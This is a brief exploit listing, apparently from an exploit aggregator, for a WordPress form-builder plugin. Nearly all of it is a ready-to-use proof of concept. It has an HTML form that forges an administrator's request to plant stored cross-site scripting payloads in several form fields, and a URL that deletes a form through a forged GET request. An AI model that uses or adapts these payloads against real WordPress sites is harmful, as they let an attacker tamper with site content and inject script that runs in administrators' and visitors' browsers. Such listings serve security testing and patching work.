Share
## https://sploitus.com/exploit?id=WPEX-ID:114C0202-39F8-4748-AC0D-013D2D6F02F7
Edit a form and put XSS payloads:
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST">
<input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' />
<input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' />
<input type="hidden" name="formbuilder[recipient]" value='admin@localhost.orgA New Form"><script>alert(/XSS3/)</script>' />
<input type="hidden" name="formbuilder[method]" value="POST" />
<input type="hidden" name="formbuilder[action]" value="" />
<input type="hidden" name="formbuilder[thankyoutext]" value="" />
<input type="hidden" name="formbuilder[autoresponse]" value="" />
<input type="hidden" name="formbuilder[tags]" value="" />
<input type="hidden" name="Save" value="Save Form" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2